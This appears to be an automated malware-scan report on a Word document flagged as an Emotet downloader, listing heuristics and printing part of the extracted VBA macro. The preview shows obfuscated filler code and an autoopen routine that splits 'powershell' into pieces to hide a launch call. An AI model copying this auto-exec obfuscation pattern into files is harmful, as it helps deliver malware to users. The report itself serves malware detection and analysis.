Verdict: MALICIOUS (risk score 282)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. The critical heuristics indicate the use of VBA to launch a WMI process for execution, a common technique for Emotet. The ClamAV detection explicitly names Emotet. The autoopen macro is present, suggesting an auto-execution vector.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6888557-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6888557-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64482 bytes | 31255a01e14b31b9f12a7c0e402d7c73a0020893aedb6654b1fc435fb8cb13d6 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "fA4x41G_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RxAkDG()
Set KUDADcQ4 = iDGQcDAB
If rAAwAo_U = pAXwQ_ Then
LAA111kB = Atn(389993422 - Chr(aAA_Ak) * HAXZAAQA * 781285850)
AQUXADD = CStr(Ik4Z1A1)
R1kCZQ = CStr(603495336 * 35185072)
ZZkAGCA = Tan(tkUABw - Sqr(jGwAQQ))
End If
Set IkXAAQB = IQXQkUAG
If RZDxDAA = DABDAQ Then
BCZAADw = Tan(495840326 - Round(CG1B1A) * wDDDZ4A * 717812965)
QUAwcDw = Atn(P1kBQxBG)
ZcQZUBxA = CByte(955441586 * 464899205)
QAAXGA = Oct(zABDBABA - CDate(iACAAQ))
End If
Set SAwZAADA = MAADkxA
If DDoBDGkA = PAwAQ4DA Then
vAkCA1AB = CDate(445482050 - Atn(PCwx4ZAB) * jxAxZx * 786532153)
BXBocAA = Tan(EoQ4Dk)
zAAk1c = CDate(538740175 * 920366575)
jCAAxAcw = Fix(CwGDB4QC - CDate(w1cAAA))
End If
Set qAAQDwA = iAwXAAZA
If dQx_GAA = vAAADZ1A Then
PAxAXx_w = Sqr(444195033 - Fix(HoAD4AA) * lX4xADAQ * 860980133)
FBUwUQ = Atn(XXAUB1QA)
nAZDwwD = Chr(62586747 * 2899116)
jUDAQA = Sin(dUAQxQQ - Hex(mUcABwk))
End If
Set AAZBBA = iCDcAA
If NACCAA = mGAwACUB Then
TABAwG4 = CStr(398873103 - Cos(Y_Q4Ac) * CAoAC4 * 817576821)
oDAwADB = CDate(cAU1DA)
WAAxDAA = CDate(480118261 * 784366991)
jACkDkA = CSng(uwUAABAG - CDate(YkBBAQwQ))
End If
Set RABcAAw = KCA_AwAw
If tDA_AAo = qXQB_AUA Then
rcwABA = CByte(835208117 - Hex(fXABBxc) * oBAA4DDA * 443397509)
cACAAwG = Tan(pBAZDAGx)
c__U_ACQ = ChrB(375301091 * 871441779)
JAUCBw = Log(jAAGACAB - Hex(kD1QoxDD))
End If
Set PG_B1AkB = AAoAAD
If vUAUAX = UAACxA Then
aQAABA4Q = Sin(423254718 - CDbl(pA1xA_xA) * voA_AGUB * 991777192)
ixkQAC_4 = Atn(wAQ14k)
YxAXD4 = Sin(891374137 * 649996850)
hwCA4UkA = CDate(QQQAUQC - Log(JABGAQxA))
End If
Set uDU4AUx = aAUDZk
If zZAkxAA = zUAA4GA Then
qAC44A = Round(713217518 - CDate(ZBGUkZAA) * SBBGUAU4 * 528361664)
TCoA1B4D = Fix(UDAQAB4A)
O4xkXAA = Rnd(254314206 * 846279766)
JGokAQc = CInt(mcAACQQ - Log(vkAkA4Q))
End If
End Function
Sub autoopen()
On Error Resume Next
Set qA1UGZA = JDCA1ZC
If iUUUGC4 = moZwDQDC Then
z1QAZA1 = CInt(892403472 - Cos(wC14oAAX) * RQAQQDA * 954218095)
kDAZG1A = CDbl(DUAXACAB)
C_AQ1kw = Hex(492367677 * 998563297)
IA4xAA = ChrB(wBcU1DDA - CLng(fUAABACB))
End If
Set HQo_AZAx = P_GAAU
If E4AkwU = lUXAoA_A Then
PBcAQAA4 = Oct(693188833 - Chr(K1UAoAUU) * aAAQABQ * 253914686)
MGQU1A = Fix(L14UDA)
YAcBAAx = Sgn(610649135 * 795647424)
hDDAD1kA = Round(PCBUA_A - ChrW(JAAADkAB))
End If
Set ND1ADA = WDkAAkAQ
If iDAAADB = CAZZxA Then
dADo4UAA = CLng(128701016 - CSng(CCAAACAx) * bCDA44x * 941855036)
AZwZZU = CDate(TUxGcQ)
p1AQ4AA = Sqr(540818717 * 34663150)
lckUCA = Chr(dAQkDDDA - Log(sC1xAA))
End If
bQABABAC (VAAkQoA + "po" + jABACA + "wershel" + CUAQ_QQ + YxAD1Ak + JXoGBUAA + KoUAA_Aw + tDAAcA + FABwAA + No_wUZB + bQAQABUU + DADAkAB + wQAAxQ + jCCAAwAw)
Set KUACcAA = iAQQ1w
If EADUZAX = fAUADA Then
sDUAAA_ = CInt(994063378 - CDate(QAADUG) * zAwUGko * 911548812)
vA1AcU = CDate(CGAZAU)
tAUQBAA = Log(12752109 * 659296595)
HAABDk = CLng(uoQACA - ChrW(QQZABAk))
End If
Set bGZoAAAZ = pcCoAUQk
If fUXAcA = FAA_xAA Then
GCAAUoXQ = Log(407682292 - Sin(XZxDAkAk) * vAUUAGo * 350980767)
Ew4GX4 = Cos(acABUw)
RAAoZGX = Oct(341599338 * 199806261)
AcwAAAA = Rnd(uDXkQA - CSng(KDAXAAD))
End If
End Sub
Function oAxA_Q()
Set ncQGA4D = kAAUQA4
If HD_GQAQ = aABAcAok Then
... (truncated)